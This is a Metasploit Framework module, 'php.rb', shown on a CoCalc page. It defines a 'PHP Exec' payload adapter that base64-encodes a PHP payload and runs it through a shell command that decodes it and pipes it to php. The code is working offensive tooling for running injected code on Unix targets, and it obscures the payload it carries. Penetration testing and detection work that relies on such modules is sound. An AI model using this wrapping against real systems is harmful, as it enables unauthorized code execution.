CoCalc -- php.rb

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/adapters/cmd/unix/php.rb
Views: ¹⁹⁰¹⁶

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  include Msf::Payload::Adapter
8
  def initialize(info = {})
9
    super(
10
      update_info(
11
        info,
12
        'Name' => 'PHP Exec',
13
        'Description' => 'Execute a PHP payload from a command',
14
        'Author' => ['Spencer McIntyre', 'msutovsky-r7'],
15
        'Platform' => 'unix',
16
        'Arch' => ARCH_CMD,
17
        'License' => MSF_LICENSE,
18
        'AdaptedArch' => ARCH_PHP,
19
        'AdaptedPlatform' => 'php'
20
      )
21
    )
22
  end
23

24
  def compatible?(mod)
25
    if mod.type == Msf::MODULE_PAYLOAD && mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic && (mod.class::CachedSize >= 120_000) # echo does not have an unlimited amount of space
26
      return false
27
    end
28

29
    super
30
  end
31

32
  def generate(_opts = {})
33
    payload = super
34
    "echo '#{Base64.strict_encode64(payload)}'|base64 -d|exec $(command -v php)"
35
  end
36

37
  def include_send_uuid
38
    true
39
  end
40
end
41

42

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place. Commercial Alternative to JupyterHub.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.